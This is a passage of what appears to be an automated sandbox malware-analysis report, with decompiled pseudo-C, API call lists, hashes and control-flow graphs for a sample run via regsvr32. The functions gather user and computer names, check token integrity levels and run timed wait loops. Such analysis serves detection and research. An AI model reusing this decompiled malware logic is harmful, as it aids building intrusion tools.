				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x1aa298);
					_v20 = 0;
					_v16 = 0;
					L001A7DDC();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x1aa2c4; // 0x18c
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x1aa2a4 = 5;
						} else {
							_t69 = E001A14C4(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x1aa2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E001A2FE6( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16);
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E001A1723(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x1aa29c);
							goto L21;
						} else {
							__eflags =  *0x1aa2a0; // 0x1
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E001A454A();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x1aa2a0);
								L21:
								L001A7DDC();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x1aa290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                    0x001a6d30
                                    0x001a6d42
                                    0x001a6d45
                                    0x001a6d51
                                    0x001a6d59
                                    0x001a6d5c
                                    0x001a6ec2
                                    0x001a6d62
                                    0x001a6d62
                                    0x001a6d64
                                    0x001a6d69
                                    0x001a6d6a
                                    0x001a6d70
                                    0x001a6d73
                                    0x001a6d76
                                    0x001a6d84
                                    0x001a6d8f
                                    0x001a6d92
                                    0x001a6d94
                                    0x001a6da1
                                    0x001a6dab
                                    0x001a6daf
                                    0x001a6db2
                                    0x001a6db7
                                    0x001a6dc2
                                    0x001a6dc2
                                    0x001a6db9
                                    0x001a6db9
                                    0x001a6dc0
                                    0x00000000
                                    0x00000000
                                    0x001a6dc0
                                    0x001a6dcc
                                    0x00000000
                                    0x001a6dcf
                                    0x001a6dd3
                                    0x001a6dde
                                    0x001a6dde
                                    0x001a6de5
                                    0x001a6dea
                                    0x001a6df1
                                    0x001a6dfa
                                    0x001a6e00
                                    0x001a6e03
                                    0x001a6e0a
                                    0x001a6e0d
                                    0x00000000
                                    0x00000000
                                    0x001a6e0f
                                    0x001a6e12
                                    0x001a6e15
                                    0x001a6e18
                                    0x00000000
                                    0x001a6e1a
                                    0x001a6e29
                                    0x001a6e29
                                    0x00000000
                                    0x001a6e57
                                    0x001a6e57
                                    0x001a6e5c
                                    0x001a6e7b
                                    0x001a6e7d
                                    0x001a6e82
                                    0x001a6e83
                                    0x00000000
                                    0x001a6e5e
                                    0x001a6e5e
                                    0x001a6e64
                                    0x00000000
                                    0x001a6e66
                                    0x001a6e66
                                    0x001a6e6b
                                    0x001a6e6d
                                    0x001a6e72
                                    0x001a6e73
                                    0x001a6e89
                                    0x001a6e89
                                    0x001a6e91
                                    0x001a6e9c
                                    0x001a6e9f
                                    0x001a6eaa
                                    0x001a6eac
                                    0x001a6eae
                                    0x001a6eb1
                                    0x00000000
                                    0x001a6eb7
                                    0x00000000
                                    0x001a6eb7
                                    0x001a6eb1
                                    0x001a6e64
                                    0x00000000
                                    0x001a6e5c
                                    0x001a6e2c
                                    0x001a6e2e
                                    0x001a6e31
                                    0x001a6e32
                                    0x001a6e32
                                    0x001a6e36
                                    0x001a6e40
                                    0x001a6e40
                                    0x001a6e46
                                    0x001a6e49
                                    0x001a6e49
                                    0x001a6e4f
                                    0x001a6e4f
                                    0x001a6ecc
                                    0x00000000

                                    APIs
                                    • memset.NTDLL ref: 001A6D45
                                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 001A6D51
                                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001A6D76
                                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001A6D92
                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001A6DAB
                                    • HeapFree.KERNEL32(00000000,00000000), ref: 001A6E40
                                    • CloseHandle.KERNEL32(?), ref: 001A6E4F
                                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 001A6E89
                                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,001A5FE7), ref: 001A6E9F
                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001A6EAA
                                      • Part of subcall function 001A14C4: StrToIntExW.SHLWAPI(?,00000000,?), ref: 001A1513
                                      • Part of subcall function 001A14C4: HeapFree.KERNEL32(00000000,00000000,?), ref: 001A15B0
                                      • Part of subcall function 001A14C4: HeapFree.KERNEL32(00000000,?), ref: 001A15C2
                                    • GetLastError.KERNEL32 ref: 001A6EBC
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                    • String ID:
                                    • API String ID: 3521023985-0
                                    • Opcode ID: 1f4679c2e906fe213c4895d329c99b4022108e84e5cc526f06a652b74cae6643
                                    • Instruction ID: d10f3a5b4dfacbe8973b8facf6ca4c5f615d3241f6c8490ef907a71b47ad40a8
                                    • Opcode Fuzzy Hash: 1f4679c2e906fe213c4895d329c99b4022108e84e5cc526f06a652b74cae6643
                                    • Instruction Fuzzy Hash: AB516BB9901228AECF11DFA4DD44DEEBFBDEF0A760F244116F514E2191D7718A84CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A4E2A, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    C-Code - Quality: 74%
                                    			E001A4E2A(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L001A7DD6();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x1aa2d4; // 0x314d7d0
				_t5 = _t13 + 0x1ab84d; // 0x32f901d
				_t6 = _t13 + 0x1ab580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L001A7ABA();
				_t17 = CreateFileMappingW(0xffffffff, 0x1aa2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                    0x001a4e2a
                                    0x001a4e32
                                    0x001a4e36
                                    0x001a4e3c
                                    0x001a4e41
                                    0x001a4e46
                                    0x001a4e49
                                    0x001a4e4c
                                    0x001a4e51
                                    0x001a4e52
                                    0x001a4e55
                                    0x001a4e5a
                                    0x001a4e61
                                    0x001a4e6b
                                    0x001a4e6d
                                    0x001a4e6e
                                    0x001a4e71
                                    0x001a4e8d
                                    0x001a4e93
                                    0x001a4e97
                                    0x001a4ee5
                                    0x001a4e99
                                    0x001a4ea6
                                    0x001a4eb6
                                    0x001a4ebe
                                    0x001a4ed0
                                    0x001a4ed4
                                    0x00000000
                                    0x00000000
                                    0x001a4ec0
                                    0x001a4ec3
                                    0x001a4ec8
                                    0x001a4eca
                                    0x001a4eca
                                    0x001a4ea8
                                    0x001a4eaa
                                    0x001a4ed6
                                    0x001a4ed7
                                    0x001a4ed7
                                    0x001a4ea6
                                    0x001a4eec

                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,001A5E63,?,00000001,?), ref: 001A4E36
                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 001A4E4C
                                    • _snwprintf.NTDLL ref: 001A4E71
                                    • CreateFileMappingW.KERNELBASE(000000FF,001AA2F8,00000004,00000000,00001000,?), ref: 001A4E8D
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A5E63,?), ref: 001A4E9F
                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 001A4EB6
                                    • CloseHandle.KERNEL32(00000000), ref: 001A4ED7
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A5E63,?), ref: 001A4EDF
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                    • String ID:
                                    • API String ID: 1814172918-0
                                    • Opcode ID: 7b85ff00403dee3a1facf86dcc66cea8993845cca829e4d892ee7dcea0d50d69
                                    • Instruction ID: 411194bf76393128665d21870553ef3e2e52f051acd80e969fda0e0b672ab349
                                    • Opcode Fuzzy Hash: 7b85ff00403dee3a1facf86dcc66cea8993845cca829e4d892ee7dcea0d50d69
                                    • Instruction Fuzzy Hash: 6521D57A600204BBC721DB68DC05F9E77BDBF86790F254121F905E71D0D7B49944C760
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A5DCD, Relevance: 12.2, APIs: 8, Instructions: 191memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 218 1a5dcd-1a5de8 call 1a6296 221 1a5dea-1a5df8 218->221 222 1a5dfe-1a5e0c CoInitializeEx 218->222 221->222 223 1a5e1e-1a5e65 call 1a3822 ConvertStringSecurityDescriptorToSecurityDescriptorA call 1a4e2a 222->223 224 1a5e0e-1a5e11 222->224 232 1a5e70-1a5e73 223->232 233 1a5e67-1a5e6a CloseHandle 223->233 224->223 225 1a5e13-1a5e18 224->225 225->223 227 1a5ffd 225->227 230 1a5fff-1a6005 227->230 234 1a5e9c-1a5eac 232->234 235 1a5e75-1a5e7a 232->235 233->232 236 1a5eae-1a5eb3 call 1a2e33 234->236 237 1a5ef5-1a5f13 call 1a13ab call 1a77d7 234->237 238 1a5fe9-1a5fed 235->238 239 1a5e80 235->239 246 1a5eb8-1a5ec3 call 1a77d7 236->246 255 1a5f40-1a5f42 237->255 256 1a5f15-1a5f3e memset RtlInitializeCriticalSection 237->256 242 1a5fef-1a5ff3 238->242 243 1a5ff5-1a5ffb 238->243 240 1a5e83-1a5e95 call 1a1697 239->240 253 1a5e97 240->253 242->230 242->243 243->230 257 1a5eef 246->257 258 1a5ec5-1a5eec wsprintfA 246->258 253->238 259 1a5f43-1a5f45 255->259 256->259 257->237 258->257 259->238 260 1a5f4b-1a5f61 RtlAllocateHeap 259->260 261 1a5f8b-1a5f8d 260->261 262 1a5f63-1a5f89 wsprintfA 260->262 263 1a5f8e-1a5f90 261->263 262->263 263->238 264 1a5f92-1a5fb2 call 1a2e33 call 1a2654 263->264 264->238 269 1a5fb4-1a5fbb call 1a28c0 264->269 272 1a5fbd-1a5fc0 269->272 273 1a5fc2-1a5fc9 269->273 272->238 274 1a5fcb-1a5fcd 273->274 275 1a5fde-1a5fe2 call 1a6d30 273->275 274->238 276 1a5fcf-1a5fdc call 1a1d8c 274->276 279 1a5fe7 275->279 276->238 276->275 279->238
                                    C-Code - Quality: 64%
                                    			E001A5DCD(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E001A6296();
				if(_t27 != 0) {
					_t77 =  *0x1aa2b4; // 0x10000106
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x1aa2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x1aa148(0, 2);
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E001A3822( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x1aa2d4; // 0x314d7d0
					_push(0x1aa2fc);
					_push(1);
					_t7 = _t32 + 0x1ab5bc; // 0x4d283a53
					 *0x1aa2f8 = 0xc;
					 *0x1aa300 = 0;
					L001A1D3B();
					_t36 = E001A4E2A(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E001A2E33(_t37 ^ 0xe8fa7dd7,  &_v40); // executed
							_t87 = E001A77D7(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x1aa2d4; // 0x314d7d0
								_t18 = _t64 + 0x1ab86f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x1aa32c = _t87;
						}
						_t38 = E001A13AB();
						 *0x1aa2c8 =  *0x1aa2c8 ^ 0xe8fa7dd7;
						 *0x1aa31c = _t38;
						_t39 = E001A77D7(0x60);
						__eflags = _t39;
						 *0x1aa37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x1aa37c; // 0x32f9858
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x1aa37c; // 0x32f9858
							 *_t56 = 0x1ab85e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x1aa290, _t84, 0x52);
							__eflags = _t42;
							 *0x1aa314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x1aa2b4; // 0x10000106
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x1aa2d4; // 0x314d7d0
								_t19 = _t76 + 0x1ab212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x1a92a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E001A2E33( ~_v8 &  *0x1aa2c8, 0x1aa00c); // executed
								_t84 = E001A2654(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E001A28C0();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E001A6D30(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E001A1D8C(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x1aa14c();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E001A1697(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}






































                                    0x001a5dcd
                                    0x001a5dd8
                                    0x001a5ddb
                                    0x001a5dde
                                    0x001a5de1
                                    0x001a5de8
                                    0x001a5dea
                                    0x001a5df6
                                    0x001a5df8
                                    0x001a5df8
                                    0x001a5e01
                                    0x001a5e09
                                    0x001a5e0c
                                    0x001a5e26
                                    0x001a5e2b
                                    0x001a5e2c
                                    0x001a5e2e
                                    0x001a5e33
                                    0x001a5e38
                                    0x001a5e3a
                                    0x001a5e41
                                    0x001a5e4b
                                    0x001a5e51
                                    0x001a5e5e
                                    0x001a5e65
                                    0x001a5e6a
                                    0x001a5e6a
                                    0x001a5e73
                                    0x001a5e9c
                                    0x001a5e9f
                                    0x001a5eac
                                    0x001a5eb3
                                    0x001a5ebf
                                    0x001a5ec1
                                    0x001a5ec3
                                    0x001a5ec8
                                    0x001a5ece
                                    0x001a5ed4
                                    0x001a5eda
                                    0x001a5edd
                                    0x001a5ee2
                                    0x001a5eea
                                    0x001a5eec
                                    0x001a5eec
                                    0x001a5eef
                                    0x001a5eef
                                    0x001a5ef5
                                    0x001a5efa
                                    0x001a5f02
                                    0x001a5f07
                                    0x001a5f0c
                                    0x001a5f0e
                                    0x001a5f13
                                    0x001a5f42
                                    0x001a5f15
                                    0x001a5f1a
                                    0x001a5f1f
                                    0x001a5f24
                                    0x001a5f2b
                                    0x001a5f31
                                    0x001a5f36
                                    0x001a5f3c
                                    0x001a5f3c
                                    0x001a5f43
                                    0x001a5f45
                                    0x001a5f54
                                    0x001a5f5a
                                    0x001a5f5c
                                    0x001a5f61
                                    0x001a5f8d
                                    0x001a5f63
                                    0x001a5f63
                                    0x001a5f69
                                    0x001a5f76
                                    0x001a5f7c
                                    0x001a5f7c
                                    0x001a5f84
                                    0x001a5f86
                                    0x001a5f8e
                                    0x001a5f90
                                    0x001a5f97
                                    0x001a5fa4
                                    0x001a5fae
                                    0x001a5fb0
                                    0x001a5fb2
                                    0x00000000
                                    0x00000000
                                    0x001a5fb4
                                    0x001a5fb9
                                    0x001a5fbb
                                    0x001a5fc2
                                    0x001a5fc6
                                    0x001a5fc9
                                    0x001a5fde
                                    0x001a5fe2
                                    0x001a5fe7
                                    0x00000000
                                    0x001a5fe7
                                    0x001a5fcb
                                    0x001a5fcd
                                    0x00000000
                                    0x00000000
                                    0x001a5fcf
                                    0x001a5fd8
                                    0x001a5fda
                                    0x001a5fdc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a5fdc
                                    0x001a5fbf
                                    0x001a5fbf
                                    0x001a5f90
                                    0x001a5e75
                                    0x001a5e75
                                    0x001a5e7a
                                    0x001a5fe9
                                    0x001a5fed
                                    0x001a5ff5
                                    0x001a5ff5
                                    0x00000000
                                    0x001a5fed
                                    0x001a5e80
                                    0x001a5e83
                                    0x001a5e83
                                    0x001a5e85
                                    0x001a5e88
                                    0x001a5e90
                                    0x001a5e97
                                    0x00000000
                                    0x001a5ffd
                                    0x001a5ffd
                                    0x001a6000
                                    0x001a6005
                                    0x001a6005

                                    APIs
                                      • Part of subcall function 001A6296: GetModuleHandleA.KERNEL32(4C44544E,00000000,001A5DE6,00000000,00000000,00000000,?,?,?,?,?,001A66FE,?,00000001), ref: 001A62A5
                                    • CoInitializeEx.OLE32(00000000,00000002), ref: 001A5E01
                                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,001AA2FC,00000000), ref: 001A5E51
                                    • CloseHandle.KERNEL32(?), ref: 001A5E6A
                                    • wsprintfA.USER32 ref: 001A5EEA
                                    • memset.NTDLL ref: 001A5F1A
                                    • RtlInitializeCriticalSection.NTDLL(032F9818), ref: 001A5F2B
                                    • RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 001A5F54
                                    • wsprintfA.USER32 ref: 001A5F84
                                      • Part of subcall function 001A2E33: GetUserNameW.ADVAPI32(00000000,001A5FA9), ref: 001A2E6A
                                      • Part of subcall function 001A2E33: RtlAllocateHeap.NTDLL(00000000,001A5FA9), ref: 001A2E81
                                      • Part of subcall function 001A2E33: GetUserNameW.ADVAPI32(00000000,001A5FA9), ref: 001A2E8E
                                      • Part of subcall function 001A2E33: HeapFree.KERNEL32(00000000,00000000), ref: 001A2EAF
                                      • Part of subcall function 001A2E33: GetComputerNameW.KERNEL32(00000000,00000000), ref: 001A2ED6
                                      • Part of subcall function 001A2E33: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001A2EEA
                                      • Part of subcall function 001A2E33: GetComputerNameW.KERNEL32(00000000,00000000), ref: 001A2EF7
                                      • Part of subcall function 001A2E33: HeapFree.KERNEL32(00000000,00000000), ref: 001A2F15
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleInitializeSecurityUserwsprintf$CloseConvertCriticalModuleSectionStringmemset
                                    • String ID:
                                    • API String ID: 2719557597-0
                                    • Opcode ID: 2686a30a7570b552830a3f560fb0cdcaa689d5eaee511b7355d2116e3032a71d
                                    • Instruction ID: da43e320275301f63285084c4e37f363d5b340355f0ebacd8ee256f74d394ec6
                                    • Opcode Fuzzy Hash: 2686a30a7570b552830a3f560fb0cdcaa689d5eaee511b7355d2116e3032a71d
                                    • Instruction Fuzzy Hash: 135122BA904614AFDB21DBA8DD85FAEB7BAAF17700F500012F804E7651D774DE80CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A39E8, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 314 1a39e8-1a3a03 315 1a3a09-1a3a22 OpenProcessToken 314->315 316 1a3aa2-1a3aae 314->316 317 1a3aa1 315->317 318 1a3a24-1a3a4f GetTokenInformation * 2 315->318 317->316 319 1a3a51-1a3a5e call 1a77d7 318->319 320 1a3a97-1a3aa0 CloseHandle 318->320 323 1a3a60-1a3a71 GetTokenInformation 319->323 324 1a3a96 319->324 320->317 325 1a3a73-1a3a8d GetSidSubAuthorityCount GetSidSubAuthority 323->325 326 1a3a90-1a3a91 call 1a77ec 323->326 324->320 325->326 326->324
                                    C-Code - Quality: 100%
                                    			E001A39E8(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x1aa2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E001A77D7(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E001A77EC(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                    0x001a39f5
                                    0x001a39fc
                                    0x001a3a03
                                    0x001a3a17
                                    0x001a3a22
                                    0x001a3a3a
                                    0x001a3a47
                                    0x001a3a4a
                                    0x001a3a4f
                                    0x001a3a5a
                                    0x001a3a5e
                                    0x001a3a6d
                                    0x001a3a71
                                    0x001a3a8d
                                    0x001a3a8d
                                    0x001a3a91
                                    0x001a3a91
                                    0x001a3a96
                                    0x001a3a9a
                                    0x001a3aa0
                                    0x001a3aa1
                                    0x001a3aa8
                                    0x001a3aae

                                    APIs
                                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 001A3A1A
                                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 001A3A3A
                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 001A3A4A
                                    • CloseHandle.KERNEL32(00000000), ref: 001A3A9A
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 001A3A6D
                                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 001A3A75
                                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 001A3A85
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                    • String ID:
                                    • API String ID: 1295030180-0
                                    • Opcode ID: 14003991119e177b5c40bafe8358061cdcb821dde779c1b1b1b83c504a2b6fb2
                                    • Instruction ID: 518263705d6de4d77d492a1db1542c3725e2310c935a0c5a3f8256bebf898341
                                    • Opcode Fuzzy Hash: 14003991119e177b5c40bafe8358061cdcb821dde779c1b1b1b83c504a2b6fb2
                                    • Instruction Fuzzy Hash: 0D212A79900219FFEB11DF94DD84EAEBBB9EF05304F0040A5F611A61A1D7715F54EB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A6632, Relevance: 10.6, APIs: 7, Instructions: 73sleepmemorytimeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 328 1a6632-1a6654 HeapCreate 329 1a665e-1a6673 GetTickCount call 1a6707 328->329 330 1a6656-1a6659 328->330 331 1a66fe-1a6704 329->331 334 1a6679-1a66c6 GetSystemTimeAsFileTime SwitchToThread _aullrem call 1a1228 Sleep 329->334 330->331 337 1a66c8-1a66d3 334->337 338 1a66f9 call 1a5dcd 337->338 339 1a66d5-1a66e3 IsWow64Process 337->339 338->331 341 1a66e9-1a66ed 339->341 342 1a66e5 339->342 341->338 343 1a66ef 341->343 342->341 343->338
                                    C-Code - Quality: 73%
